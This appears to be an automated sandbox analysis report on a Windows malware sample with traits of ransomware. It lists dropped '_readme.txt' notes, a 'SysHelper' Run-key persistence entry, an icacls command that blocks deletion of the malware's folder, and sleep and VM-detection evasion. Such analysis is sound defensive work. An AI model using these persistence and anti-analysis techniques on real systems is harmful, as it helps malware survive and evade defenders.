              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298200756.000000000383A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307758471.00000000038E8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297158244.00000000037EE000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297500931.0000000003829000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306454387.00000000038CC000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2299485751.000000000388A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2299340114.0000000003840000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307467722.00000000038D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\T source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298890596.0000000003B02000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307527322.0000000003AF0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306204411.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307814627.0000000003B11000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275138437.000000000388F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251695399.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276086139.00000000038D0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251930708.0000000003335000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274611974.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274989424.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275446209.00000000038BC000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275255859.0000000003339000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251695399.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251930708.0000000003335000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274611974.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274989424.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275255859.0000000003339000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\O\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274518073.00000000037AA000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274719064.00000000037C3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: sers\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.ppvw source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\* source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251480244.0000000003361000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046044060.0000000003378000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\C\e\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2360903093.0000000003AED000.00000004.00000020.00020000.00000000.sdmp
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00472220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,0_2_00472220
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00488565 push ecx; ret 0_2_00488578
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_00488565 push ecx; ret 2_2_00488578
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 3_2_00E58565 push ecx; ret 3_2_00E58578
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E58565 push ecx; ret 4_2_00E58578

              Persistence and Installation Behavior

              barindex
              Infects executable files (exe, dll, sys, html)
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Temp\wctF86A.tmpJump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctF86A.tmp.ppvw (copy)Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeJump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Temp\wct3D66.tmp.ppvw (copy)Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Temp\wct3D66.tmpJump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\_readme.txtJump to behavior
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\_readme.txtJump to behavior
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_004E1920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,0_2_004E1920
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55" /deny *S-1-1-0:(OI)(CI)(DE,DC)
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Found stalling execution ending in API Sleep call
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeStalling execution: Execution stalls by calling Sleepgraph_2-41502
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeStalling execution: Execution stalls by calling Sleepgraph_3-40936
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00461178 rdtsc 0_2_00461178
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_004E1920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_004E1920
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,0_2_0046E670
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,2_2_0046E670
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,3_2_00E3E670
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,4_2_00E3E670
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeThread delayed: delay time: 1100000Jump to behavior
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wctF86A.tmpJump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeDropped PE file which has not been started: C:\Users\user\Local Settings\Temp\wctF86A.tmp.ppvw (copy)Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeDropped PE file which has not been started: C:\Users\user\Local Settings\Temp\wct3D66.tmp.ppvw (copy)Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wct3D66.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeEvaded block: after key decision
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-38462
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeAPI coverage: 6.0 %
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe TID: 8140Thread sleep time: -1100000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe TID: 7680Thread sleep count: 160 > 30Jump to behavior
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00470160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_00470160
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_0046F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_0046F730
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_0046FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,0_2_0046FB98
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_0046F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0046F730
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_00470160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00470160
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_0046FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0046FB98
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 3_2_00E3F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00E3F730
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 3_2_00E40160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00E40160
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 3_2_00E3FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,3_2_00E3FB98
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E40160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,4_2_00E40160
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E3F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,4_2_00E3F730
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E3FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,4_2_00E3FB98
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeThread delayed: delay time: 1100000Jump to behavior
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000002.1840014089.00000000016D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0rv
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1956219802.0000000003772000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1961780221.0000000003770000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 10/04/2023 10:55:35.770OFFICECL (0x1988)0x75cTelemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 21, "Time": "2023-10-04T09:55:05Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1959501521.0000000003770000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 10/03/2023 13:09:52.535OFFICECL (0x2394)0x12d8Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 11, "Time": "2023-10-03T12:09:52Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": 